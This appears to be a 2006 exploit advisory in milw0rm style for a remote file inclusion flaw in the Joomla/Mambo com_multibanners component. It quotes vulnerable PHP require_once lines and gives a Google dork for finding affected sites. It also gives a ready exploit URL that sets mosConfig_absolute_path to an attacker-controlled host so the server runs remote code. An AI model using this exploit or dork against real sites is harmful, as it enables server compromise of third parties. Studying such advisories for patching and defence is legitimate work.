44 lines
No EOL
1.3 KiB
Text
44 lines
No EOL
1.3 KiB
Text
#############################SolpotCrew Community################################
|
|
#
|
|
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
|
|
#
|
|
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
|
|
#
|
|
#################################################################################
|
|
#
|
|
#
|
|
# Bug Found By :Blue|Spy
|
|
#
|
|
# contact: mail@blue-spy.net
|
|
#
|
|
# Website : http://kunamgede.biz, http://blue-spy.net
|
|
#
|
|
################################################################################
|
|
#
|
|
#
|
|
# Greetz: h4ntu , Fungky, Solpot, Matdhule
|
|
# and all crew #mardongan @ irc.dal.net
|
|
#
|
|
#
|
|
###############################################################################
|
|
|
|
code from extadminmenus.class.php
|
|
|
|
if (phpversion() < '4.2.0') {
|
|
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
|
|
}
|
|
|
|
if (phpversion() < '4.3.0') {
|
|
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
|
|
}
|
|
|
|
Dork:
|
|
inurl:com_multibanners
|
|
|
|
exploit:
|
|
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]
|
|
|
|
##############################MY LOVE JUST FOR U LIENA#########################
|
|
########################################################################
|
|
|
|
# milw0rm.com [2006-07-23] |